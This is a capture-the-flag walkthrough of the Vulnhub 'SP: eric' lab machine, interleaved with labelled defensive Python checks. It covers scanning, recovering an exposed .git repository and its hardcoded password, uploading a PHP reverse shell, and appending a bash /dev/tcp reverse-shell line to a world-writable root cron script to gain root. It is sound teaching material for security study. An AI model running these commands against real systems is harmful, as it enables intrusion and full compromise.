Vulnhub Eric machine: detailed testing walkthrough

Eric

Author: jason_huawen

Machine information

Name: SP: eric

Address:

https://www.vulnhub.com/entry/sp-eric,274/

Identifying the target host IP address

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Eric]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: Finished!   |   Screen View: Unique Hosts                                                               
                                                                                                                             
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                             
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:11      1      60  Unknown vendor                                                            
 192.168.56.100  08:00:27:e5:b4:f2      1      60  PCS Systemtechnik GmbH                                                    
 192.168.56.149  08:00:27:f0:b6:e3      1      60  PCS Systemtechnik GmbH        

netdiscover, which ships with Kali Linux, identifies the target host's IP address as 192.168.56.149.

NMAP scan

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Eric]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.149 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-11 21:49 EST
Nmap scan report for bogon (192.168.56.149)
Host is up (0.00026s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 d3:79:15:3d:11:4c:af:26:6c:b2:af:6a:0b:99:14:fd (RSA)
|   256 87:48:76:38:81:c2:a0:50:cd:4c:39:c0:7c:7a:07:40 (ECDSA)
|_  256 8e:b9:dd:8d:14:9b:e3:63:1d:d7:0e:54:98:8d:29:5b (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-git: 
|   192.168.56.149:80/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|_    Last commit message: minor changes 
|_http-title: Blog under construction
|_http-server-header: Apache/2.4.29 (Ubuntu)
MAC Address: 08:00:27:F0:B6:E3 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.11 seconds

The NMAP scan shows two open ports on the target: 22 (SSH) and 80 (HTTP).

Two details in the port 80 results deserve attention:

  1. It is probably a blog site.

  2. There is a /.git directory, which needs to be analysed with a suitable tool.

Getting a shell

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Eric]
└─$ curl -s http://192.168.56.149/
<html>
<head>
<title>Blog under construction</title>
</head>

<body>
<h1>Blog under construction</h1>

<p>As a hobby project I'm learning about web development and therefore going to build this blog as a learning process. Please come back when it's finished!</p>

</body>
</html>

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Eric]
└─$ curl -s http://192.168.56.149/robots.txt
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /robots.txt was not found on this server.</p>
<hr>
<address>Apache/2.4.29 (Ubuntu) Server at 192.168.56.149 Port 80</address>
</body></html>

Take a look at the /.git directory.

Requesting that directory returns Forbidden, so a dedicated tool or a directory brute-forcer will probably be needed to reach the files beneath it. Set that aside for now.

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Eric]
└─$ nikto -h http://192.168.56.149
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.149
+ Target Hostname:    192.168.56.149
+ Target Port:        80
+ Start Time:         2023-01-11 21:54:20 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ Cookie PHPSESSID created without the httponly flag
+ OSVDB-29786: /admin.php?en_log_id=0&action=config: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.
+ OSVDB-29786: /admin.php?en_log_id=0&action=users: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.
+ OSVDB-3092: /admin.php: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3092: /.git/index: Git Index file may contain directory listing information.
+ /.git/HEAD: Git HEAD file found. Full repo details may be present.
+ /.git/config: Git config file found. Infos about repo details may be present.
+ 7915 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time:           2023-01-11 21:55:25 (GMT-5) (65 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
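nikto reports /.git/HEAD, /.git/config and /.git/index answering with 200. The following Python check is an added example, not part of the original write-up or of any tool used in it: it lets a defender sweep their own hosts for leaked repository metadata without trusting status codes alone, because a server that answers every path with a 200 HTML page (a soft 404) would otherwise produce false positives. The sample responses are constructed, and the `fetch` callable and the `base_url` passed to `http_fetch` are assumptions.

```python
import re

# Added example: verify that a response for a .git path really is git
# metadata rather than an error page returned with status 200.
GIT_PATHS = ("/.git/HEAD", "/.git/config", "/.git/index")

_HEAD_REF = re.compile(r"^ref: refs/[\w./-]+\s*$")
_HEAD_SHA = re.compile(r"^[0-9a-f]{40}\s*$")


def looks_like_git_head(body: str) -> bool:
    """A real HEAD is 'ref: refs/heads/<name>' or a bare 40-hex commit id (detached HEAD)."""
    return bool(_HEAD_REF.match(body) or _HEAD_SHA.match(body))


def looks_like_git_config(body: str) -> bool:
    """A real config carries a [core] section declaring repositoryformatversion."""
    return "[core]" in body and "repositoryformatversion" in body


def looks_like_git_index(body: bytes) -> bool:
    """The index file starts with the 4-byte signature 'DIRC'."""
    return body[:4] == b"DIRC"


def classify(path: str, status: int, body: bytes) -> bool:
    """True only when the response is git metadata, not a soft-404 page."""
    if status != 200:
        return False
    if path.endswith("/index"):
        return looks_like_git_index(body)
    text = body.decode("utf-8", errors="replace")
    if path.endswith("/HEAD"):
        return looks_like_git_head(text)
    if path.endswith("/config"):
        return looks_like_git_config(text)
    return False


def check_git_exposure(fetch):
    """fetch(path) -> (status, body_bytes). Returns the paths that are really exposed."""
    return [p for p in GIT_PATHS if classify(p, *fetch(p))]


def http_fetch(base_url: str):
    """Fetcher for a live sweep of a host you administer (base_url is assumed, e.g. 'http://127.0.0.1')."""
    import urllib.error
    import urllib.request

    def fetch(path):
        try:
            with urllib.request.urlopen(base_url.rstrip("/") + path, timeout=5) as resp:
                return resp.status, resp.read(4096)
        except urllib.error.HTTPError as err:
            return err.code, b""
    return fetch


# Constructed sample responses (not captured from the target): a host that
# leaks its repository, and one whose server returns 200 HTML for every path.
LEAKY_HOST = {
    "/.git/HEAD": (200, b"ref: refs/heads/master\n"),
    "/.git/config": (200, b"[core]\n\trepositoryformatversion = 0\n\tfilemode = true\n"),
    "/.git/index": (200, b"DIRC\x00\x00\x00\x02" + b"\x00" * 8),
}
SOFT_404_HOST = {p: (200, b"<html><body><h1>Not Found</h1></body></html>") for p in GIT_PATHS}


def fetch_from(table):
    """Offline fetcher backed by one of the constructed tables above."""
    return lambda path: table.get(path, (404, b""))


if __name__ == "__main__":
    print("leaky host exposes:", check_git_exposure(fetch_from(LEAKY_HOST)))
    print("soft-404 host exposes:", check_git_exposure(fetch_from(SOFT_404_HOST)))
```

The 23-byte size dirb later reports for /.git/HEAD matches exactly the `ref: refs/heads/master\n` line checked here. For a live sweep, pass `http_fetch("http://<your-host>")` to `check_git_exposure`; the fix on the server side is to keep the repository outside the document root or deny access to `.git` in the web-server configuration.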

Visit /admin.php and submit admin' or 1=1 -- to try to bypass the login; the response is:

Wrong username and/or password. Don't even bother bruteforcing.

Ha. Let's see whether we can find any other directories.

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Eric]
└─$ gobuster dir -u http://192.168.56.149 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.149
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.4
[+] Timeout:                 10s
===============================================================
2023/01/11 21:57:09 Starting gobuster in directory enumeration mode
===============================================================
/upload               (Status: 301) [Size: 317] [--> http://192.168.56.149/upload/]
/server-status        (Status: 403) [Size: 302]
Progress: 219243 / 220561 (99.40%)
===============================================================
2023/01/11 21:57:46 Finished
===============================================================
                                                                                                                              
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Eric]
└─$ gobuster dir -u http://192.168.56.149 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.sh,.js
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.149
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.4
[+] Extensions:              php,html,txt,sh,js
[+] Timeout:                 10s
===============================================================
2023/01/11 21:57:55 Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 293]
/index.php            (Status: 200) [Size: 281]
/.html                (Status: 403) [Size: 294]
/admin.php            (Status: 200) [Size: 306]
/upload               (Status: 301) [Size: 317] [--> http://192.168.56.149/upload/]
/.html                (Status: 403) [Size: 294]
/.php                 (Status: 403) [Size: 293]
/server-status        (Status: 403) [Size: 302]
Progress: 1321836 / 1323366 (99.88%)
===============================================================
2023/01/11 22:02:53 Finished
===============================================================
                                                                                                                              
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Eric]
└─$ dirb http://192.168.56.149

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Wed Jan 11 22:02:59 2023
URL_BASE: http://192.168.56.149/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.56.149/ ----
+ http://192.168.56.149/.git/HEAD (CODE:200|SIZE:23)                                                                         
+ http://192.168.56.149/admin.php (CODE:200|SIZE:306)                                                                        
+ http://192.168.56.149/index.php (CODE:200|SIZE:281)                                                                        
+ http://192.168.56.149/server-status (CODE:403|SIZE:302)                                                                    
==> DIRECTORY: http://192.168.56.149/upload/                                                                                 
                                                                                                                             
---- Entering directory: http://192.168.56.149/upload/ ----
                                                                                                                             
-----------------
END_TIME: Wed Jan 11 22:03:04 2023
DOWNLOADED: 9224 - FOUND: 4
                                          

Next, the repository on the target needs to be analysed with a git tool.

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Eric/GitHack-master]
└─$ ls
data  GitHack.py  lib  LICENSE  README.md
                                                                                                                              
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Eric/GitHack-master]
└─$ python2 GitHack.py http://192.168.56.149/.git/

  ____ _ _   _   _            _                                                                                               
 / ___(_) |_| | | | __ _  ___| | __                                                                                           
| |  _| | __| |_| |/ _` |/ __| |/ /                                                                                           
| |_| | | |_|  _  | (_| | (__|   <                                                                                            
 \____|_|\__|_| |_|\__,_|\___|_|\_\{0.0.5}                                                                                    
 A '.git' folder disclosure exploit.                                                                                          
                                                                                                                              
[*] Check Depends
[+] Check depends end
[*] Set Paths
[*] Target Url: http://192.168.56.149/.git/
[*] Initialize Target
[*] Try to Clone straightly
[*] Clone
Cloning into '/home/kali/Desktop/Vulnhub/Eric/GitHack-master/dist/192.168.56.149'...
fatal: repository 'http://192.168.56.149/.git/' not found
[-] Clone Error
[*] Try to Clone with Directory Listing
[*] http://192.168.56.149/.git/ is not support Directory Listing
[-] [Skip][First Try] Target is not support Directory Listing
[*] Try to clone with Cache
[*] Initialize Git
[!] Initialize Git Error: hint: Using 'master' as the name for the initial branch. This default branch name
hint: is subject to change. To configure the initial branch name to use in all                                                
hint: of your new repositories, which will suppress this warning, call:                                                       
hint:                                                                                                                         
hint:   git config --global init.defaultBranch <name>                                                                         
hint:                                                                                                                         
hint: Names commonly chosen instead of 'master' are 'main', 'trunk' and                                                       
hint: 'development'. The just-created branch can be renamed via this command:                                                 
hint:                                                                                                                         
hint:   git branch -m <name>                                                                                                  
                                                                                                                              
[*] Cache files
[*] packed-refs
[*] config
[*] HEAD
[*] COMMIT_EDITMSG
[*] ORIG_HEAD
[*] FETCH_HEAD
[*] refs/heads/master
[*] refs/remote/master
[*] index
[*] logs/HEAD
[*] logs/refs/heads/master
[*] Fetch Commit Objects
[*] objects/3d/b5628b550f5c9c9f6f663cd158374035a6eaa0
[*] objects/31/33d44be3eebe6c6761b50c6fdf5b7fb664c2d8
[*] objects/a8/9a716b3c21d8f9fee38a0693afb22c75f1d31c
[*] objects/f0/d95f54335626ce6c96522e0a9105780b3366c5
[*] objects/c0/951efcb330fc310911d714acf03b873aa9ab43
[*] objects/23/448969d5b347f8e91f8017b4d8ef6edf6161d8
[*] objects/cc/1ab96950f56d1fff0d1f006821cab6b6b0e249
[*] objects/3d/8e9ce9093fc391845dd69b0436b258ac4a6387
[*] objects/e7/ba67226cda1ecc1bd3a2537f0be94343d448bb
[*] Fetch Commit Objects End
[*] logs/refs/remote/master
[*] logs/refs/stash
[*] refs/stash
[*] Valid Repository
[+] Valid Repository Success

[+] Clone Success. Dist File : /home/kali/Desktop/Vulnhub/Eric/GitHack-master/dist/192.168.56.149
                                                                                                                              
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Eric/GitHack-master]
└─$ ls -alh
total 68K
drwxr-xr-x 5 kali kali 4.0K Jan 11 22:09 .
drwxr-xr-x 3 kali kali 4.0K Jan 11 22:08 ..
drwxr-xr-x 2 kali kali 4.0K Jan 11 22:08 data
drwxr-xr-x 3 kali kali 4.0K Jan 11 22:09 dist
-rwxr-xr-x 1 kali kali  809 Jan 11 22:08 GitHack.py
-rw-r--r-- 1 kali kali   45 Jan 11 22:08 .gitignore
drwxr-xr-x 3 kali kali 4.0K Jan 11 22:09 lib
-rw-r--r-- 1 kali kali  35K Jan 11 22:08 LICENSE
-rw-r--r-- 1 kali kali  805 Jan 11 22:08 README.md
                                                                                                                              
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Eric/GitHack-master]
└─$ cd dist          
                                                                                                                              
┌──(kali㉿kali)-[~/…/Vulnhub/Eric/GitHack-master/dist]
└─$ ls -alh
total 12K
drwxr-xr-x 3 kali kali 4.0K Jan 11 22:09 .
drwxr-xr-x 5 kali kali 4.0K Jan 11 22:09 ..
drwxr-xr-x 3 kali kali 4.0K Jan 11 22:09 192.168.56.149
                                                                                                                              
┌──(kali㉿kali)-[~/…/Vulnhub/Eric/GitHack-master/dist]
└─$ cd 192.168.56.149 
                                                                                                                              
┌──(kali㉿kali)-[~/…/Eric/GitHack-master/dist/192.168.56.149]
└─$ ls     
admin.php  index.php
                                                                                                                              
┌──(kali㉿kali)-[~/…/Eric/GitHack-master/dist/192.168.56.149]
└─$ cat admin.php    
<?php

ob_start();
session_start();

if ($_POST['submit']) {
    if ($_POST['username'] == 'admin' && $_POST['password'] == 'st@mpch0rdt.ightiRu$glo0mappL3') {
        $_SESSION['auth'] = 1;
    } else {
        exit("Wrong username and/or password. Don't even bother bruteforcing.");
    }
}

// Todo: Make sure it is only allowed to upload images.
if ($_POST['submit_post']) {
    if (move_uploaded_file($_FILES['image']['tmp_name'], 'upload/' . $_FILES['image']['name'])) {
    }
}
 
?>

<html>
<head>
<title>admin login</title>
</head>
<body>

<?php
if (!isset($_SESSION['auth'])) {
?>
<form action="admin.php" method="post">
<input name="username" type="text" placeholder="Username" />
<input name="password" type="password" placeholder="Password" /><br />
<input name="submit" type="submit" value="Login"/>
</form>

<?php
} else {
?>

<h1>Add new post (under construction)</h1>
<form action="admin.php" method="post" enctype="multipart/form-data">
<input name="post_title" type="text" placeholder="Title"><br />
<textarea name="post_body" cols="40" rows="3" placeholder="Body"></textarea><br />
<input name="image" type="file" placeholder="Image" /> 
<input type="submit" name="submit_post" value="Upload"/>
</form>

<h1>Add site to blogroll</h1>
<input name="blogroll_add" type="text"/><br/>
<input name="blogroll_submit" type="submit" value="add"/>

<?php
}
?>
</body>
</html>
                                                                                                                              
┌──(kali㉿kali)-[~/…/Eric/GitHack-master/dist/192.168.56.149]
└─$ 

GitHack recovered the admin password.

With it we can log in to /admin.php, which offers a file upload. The page gives no indication whether the upload succeeded, but visiting /upload/shell.php produces the reverse shell; the upload directory was already found during the directory enumeration stage.
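The handler's own comment, "Todo: Make sure it is only allowed to upload images", names the missing control: `move_uploaded_file()` stores whatever the client sends under the client-supplied name inside the web root. The following is an added example, not the project's admin.php, written in Python to show the checks that must run before a file is stored: an extension allow-list, a magic-byte check that the content matches the claimed type, a size limit, and a server-generated filename so the client's name never reaches the filesystem. The `ALLOWED_TYPES` table, the `MAX_BYTES` limit and the sample uploads are assumptions.

```python
import os
import secrets
import tempfile

# Added example: the validation admin.php's "Todo" comment describes.
# Allowed extensions mapped to the bytes a genuine file of that type starts with.
ALLOWED_TYPES = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}
MAX_BYTES = 2 * 1024 * 1024  # constructed size limit for the example


class UploadRejected(ValueError):
    """Raised when an upload fails any check below."""


def validate_image_upload(client_name: str, data: bytes) -> str:
    """Return a generated server-side filename, or raise UploadRejected.

    The client-supplied name only provides the claimed extension. It is never
    reused for the stored path, so traversal sequences, a .php name, or a
    double extension such as 'x.php.png' cannot decide where the file lands
    or how the web server will later serve it.
    """
    if not data or len(data) > MAX_BYTES:
        raise UploadRejected("empty or oversized upload")
    base = os.path.basename(client_name.replace("\\", "/"))
    ext = base.rsplit(".", 1)[-1].lower() if "." in base else ""
    if ext not in ALLOWED_TYPES:
        raise UploadRejected(f"extension {ext!r} is not an allowed image type")
    if not data.startswith(ALLOWED_TYPES[ext]):
        raise UploadRejected("content does not match the claimed image type")
    if ext == "jpeg":
        ext = "jpg"
    return f"{secrets.token_hex(16)}.{ext}"


def is_accepted(client_name: str, data: bytes) -> bool:
    try:
        validate_image_upload(client_name, data)
        return True
    except UploadRejected:
        return False


def store_upload(client_name: str, data: bytes, upload_dir: str) -> str:
    """Validate, then write under the generated name; returns that name."""
    safe_name = validate_image_upload(client_name, data)
    dest = os.path.join(upload_dir, safe_name)
    # O_EXCL refuses to overwrite an existing file, even on a name collision.
    fd = os.open(dest, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o644)
    with os.fdopen(fd, "wb") as fh:
        fh.write(data)
    return safe_name


# Constructed sample uploads (not files from the target).
PNG_SAMPLE = b"\x89PNG\r\n\x1a\n" + b"\x00" * 24
PHP_SAMPLE = b"<?php echo 'not an image'; ?>"


def demo() -> dict:
    """Run the checks against the samples in a throwaway upload directory."""
    with tempfile.TemporaryDirectory() as upload_dir:
        stored = store_upload("holiday.php.png", PNG_SAMPLE, upload_dir)
        return {
            "php_name_rejected": not is_accepted("shell.php", PHP_SAMPLE),
            "php_body_under_png_name_rejected": not is_accepted("shell.png", PHP_SAMPLE),
            "traversal_name_accepted_but_renamed": is_accepted("../../x.png", PNG_SAMPLE),
            "stored_name": stored,
            "stored_in_upload_dir": os.path.isfile(os.path.join(upload_dir, stored)),
        }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Two design points carry over directly to the PHP handler: the stored name comes from `secrets.token_hex`, so a double extension like `holiday.php.png` can never survive into the web root, and the upload directory should additionally have script execution disabled at the web-server level (for Apache with mod_php, `php_admin_flag engine off` for that directory), so that even a validation slip results in a file being served as data rather than run.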

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Eric]
└─$ sudo nc -nlvp 5555                                         
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.146] from (UNKNOWN) [192.168.56.149] 38574
Linux eric 4.15.0-36-generic #39-Ubuntu SMP Mon Sep 24 16:19:09 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
 04:13:12 up 26 min,  0 users,  load average: 0.00, 0.67, 1.25
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ which python
$ which python3
/usr/bin/python3
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@eric:/$ cd /home
cd /home
www-data@eric:/home$ ls -alh
ls -alh
total 12K
drwxr-xr-x  3 root root 4.0K Oct 28  2018 .
drwxr-xr-x 22 root root 4.0K Oct 21  2018 ..
drwxr-xr-x  4 eric eric 4.0K Jan 12 04:12 eric
www-data@eric:/home$ cd eric
cd eric
www-data@eric:/home/eric$ ls -alh
ls -alh
total 64K
drwxr-xr-x 4 eric eric 4.0K Jan 12 04:12 .
drwxr-xr-x 3 root root 4.0K Oct 28  2018 ..
-rw------- 1 eric eric   81 Dec 23  2018 .bash_history
-rw-r--r-- 1 eric eric  220 Oct 28  2018 .bash_logout
-rw-r--r-- 1 eric eric 3.7K Oct 28  2018 .bashrc
drwx------ 2 eric eric 4.0K Oct 28  2018 .cache
drwxrwxr-x 3 eric eric 4.0K Oct 28  2018 .local
-rw-r--r-- 1 eric eric  807 Oct 28  2018 .profile
-rw-r--r-- 1 eric eric    0 Oct 28  2018 .sudo_as_admin_successful
-rwxrwxrwx 1 root root   55 Oct 28  2018 backup.sh
-rw-r--r-- 1 root root  24K Jan 12 04:12 backup.zip
-rw-r--r-- 1 root root   13 Oct 28  2018 flag.txt
www-data@eric:/home/eric$ cat flag.txt
cat flag.txt
89340a834323
www-data@eric:/home/eric$ cat backup.sh
cat backup.sh
#!/bin/bash
zip -r /home/eric/backup.zip /var/www/html
www-data@eric:/home/eric$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
www-data@eric:/home/eric$ 

backup.sh is readable and writable by everyone, so a reverse shell can be appended to it; a cron job presumably runs it in the background, which would give root.
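The root cause here is a root-owned, world-writable script (`-rwxrwxrwx 1 root root backup.sh`) that root executes on a schedule. The following audit is an added example, not part of the original write-up: it parses a crontab in /etc/crontab format (the one with a user field, as shown above), collects the absolute paths each root job touches, and reports any regular file that is group- or world-writable or not owned by root. The crontab printed on the target does not list the backup job, so the `SAMPLE_CRONTAB` entry for backup.sh, the other sample jobs and the `SAMPLE_FILES` permission table are constructed; `stat_fn` is injectable so the audit runs offline, and defaults to `os.stat` for a real host.

```python
import os
import re
import stat

# Added example: find cron jobs that run as root but execute files a
# non-root user could modify first (the backup.sh situation above).
CRON_ENTRY = re.compile(r"^\s*(?:\S+\s+){5}(?P<user>\S+)\s+(?P<cmd>.+?)\s*$")
ABS_PATH = re.compile(r"(?<![\w./-])/[\w./-]+")


def parse_crontab(text: str):
    """Yield (user, command) per job; skip comments, blank lines and VAR=value lines."""
    for line in text.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith("#") or re.match(r"^\w+=", stripped):
            continue
        m = CRON_ENTRY.match(line)
        if m:
            yield m.group("user"), m.group("cmd")


def script_paths(command: str):
    """Absolute paths mentioned in a command: interpreter, script, redirect targets."""
    return ABS_PATH.findall(command)


def writable_by_others(st) -> bool:
    return bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_crontab(text: str, stat_fn=os.stat):
    """Return [(user, path, reason)] for root jobs whose files are not root-controlled."""
    findings = []
    for user, cmd in parse_crontab(text):
        if user != "root":
            continue
        for path in script_paths(cmd):
            try:
                st = stat_fn(path)
            except (FileNotFoundError, PermissionError):
                continue
            if not stat.S_ISREG(st.st_mode):
                continue  # directories such as /etc/cron.hourly need their own check
            if writable_by_others(st):
                findings.append((user, path, f"mode {oct(st.st_mode & 0o777)} is group/world writable"))
            elif st.st_uid != 0:
                findings.append((user, path, f"owned by uid {st.st_uid}, not root"))
    return findings


def fake_stat(mode: int, uid: int):
    """Build an os.stat_result carrying only the fields the audit reads."""
    return os.stat_result((mode, 0, 0, 1, uid, 0, 55, 0, 0, 0))


# Constructed crontab and permission table. backup.sh mirrors the mode and
# ownership seen on the target (-rwxrwxrwx root:root); everything else is made up.
SAMPLE_CRONTAB = """\
# m h dom mon dow user  command
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin
*/5 *   * * *   root    /bin/bash /home/eric/backup.sh
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
0  3    * * *   root    /usr/local/bin/rotate-logs.sh > /var/log/rotate.log
30 4    * * *   eric    /home/eric/cleanup.sh
"""
SAMPLE_FILES = {
    "/bin/bash": fake_stat(stat.S_IFREG | 0o755, 0),
    "/home/eric/backup.sh": fake_stat(stat.S_IFREG | 0o777, 0),
    "/usr/local/bin/rotate-logs.sh": fake_stat(stat.S_IFREG | 0o755, 1000),
    "/var/log/rotate.log": fake_stat(stat.S_IFREG | 0o644, 0),
    "/home/eric/cleanup.sh": fake_stat(stat.S_IFREG | 0o777, 1000),
    "/etc/cron.hourly": fake_stat(stat.S_IFDIR | 0o755, 0),
}


def stat_from_table(table):
    """Offline stat backed by the constructed table."""
    def _stat(path):
        if path not in table:
            raise FileNotFoundError(path)
        return table[path]
    return _stat


def demo():
    return audit_crontab(SAMPLE_CRONTAB, stat_from_table(SAMPLE_FILES))


if __name__ == "__main__":
    for user, path, reason in demo():
        print(f"[{user}] {path}: {reason}")
```

On a real host, `audit_crontab(open("/etc/crontab").read())` covers the system crontab; per-user root jobs live under /var/spool/cron and use the five-field format without a user column, so they would need the `user` fixed to root before parsing. The eric-owned job is skipped on purpose: a user's own cron job running a user-writable script is not a privilege boundary violation.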

Privilege escalation

www-data@eric:/home/eric$ echo 'bash -i >& /dev/tcp/192.168.56.146/6666 0>&1' >> backup.sh
< >& /dev/tcp/192.168.56.146/6666 0>&1' >> backup.sh
www-data@eric:/home/eric$ cat backup.sh
cat backup.sh
#!/bin/bash
zip -r /home/eric/backup.zip /var/www/html
bash -i >& /dev/tcp/192.168.56.146/6666 0>&1
www-data@eric:/home/eric$ 

┌──(kali㉿kali)-[~/Desktop/Toolsets/GitHack-master]
└─$ sudo nc -nlvp 6666    
[sudo] password for kali: 
listening on [any] 6666 ...
connect to [192.168.56.146] from (UNKNOWN) [192.168.56.149] 41466
bash: cannot set terminal process group (794): Inappropriate ioctl for device
bash: no job control in this shell
root@eric:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@eric:~# cd /root
cd /root
root@eric:~# ls -alh
ls -alh
total 32K
drwx------  3 root root 4.0K Dec 23  2018 .
drwxr-xr-x 22 root root 4.0K Oct 21  2018 ..
-rw-------  1 root root  275 Dec 23  2018 .bash_history
-rw-r--r--  1 root root 3.1K Apr  9  2018 .bashrc
-rw-r--r--  1 root root   21 Oct 28  2018 flag.txt
drwxr-xr-x  3 root root 4.0K Oct 28  2018 .local
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-r--r--  1 root root   66 Oct 28  2018 .selected_editor
root@eric:~# cat flag.txt
cat flag.txt
6a347b975dd18ae6497c
root@eric:~# 

We now have a root shell and the root flag.

Posted 2023-01-12 11:20 by Jason_huawen